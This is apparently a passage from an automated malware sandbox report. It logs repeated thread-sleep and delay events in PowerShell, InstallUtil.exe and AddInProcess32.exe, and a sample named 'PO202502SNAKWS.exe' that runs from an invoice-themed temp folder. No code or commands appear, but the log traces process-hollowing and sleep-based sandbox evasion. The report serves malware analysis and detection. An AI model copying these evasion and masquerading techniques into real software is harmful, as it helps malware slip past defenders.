Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595939
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594591

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3852	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5960	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 9576	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 1566
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 8293
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1312

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe

API coverage: 4.0 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212	Thread sleep count: 3852 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216	Thread sleep count: 5960 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -599185s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -598967s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -598391s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -598062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -597842s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -597516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -597391s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -597143s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -596766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -595891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -595766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -595313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -595188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -594719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -594609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -594500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5256	Thread sleep time: -594386s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7228	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1612	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -599890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -599781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -599671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -599562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -599453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -599343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -599225s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -599109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -599000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -598890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -598781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -598672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -598562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -598453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -598344s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -598234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -598125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -598016s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -597906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -597797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -597687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -597578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -597469s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -597358s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -597250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -597140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -597031s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -596922s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -596812s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -596703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -596594s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -596480s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -596375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -596265s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -596156s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -596047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -595937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -595828s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -595718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -595609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -595500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -595390s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -595281s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -595172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -595062s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -594953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -594844s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -594734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7768	Thread sleep time: -594625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -599890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -599779s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -599672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -599562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -599453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -599344s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -599234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -599125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -599015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -598906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -598797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -598687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -598578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -598469s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -598359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -598250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -598140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -598031s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -597922s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -597812s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -597703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -597594s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -597484s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -597375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -597265s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -597156s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -597047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -596937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -596828s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -596719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -596609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -596500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -596390s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -596281s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -596172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -596062s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -595939s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -595812s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -595703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -595594s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -595469s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -595359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -595250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -595140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -595031s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -594921s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -594812s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -594703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7448	Thread sleep time: -594591s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10391950 SetLastError,FindFirstFileExW,GetLastError,		6_2_00007FFD10391950
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F061950 SetLastError,FindFirstFileExW,GetLastError,		22_2_00007FFD0F061950

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599185	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598967	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597953	Jump to behavior
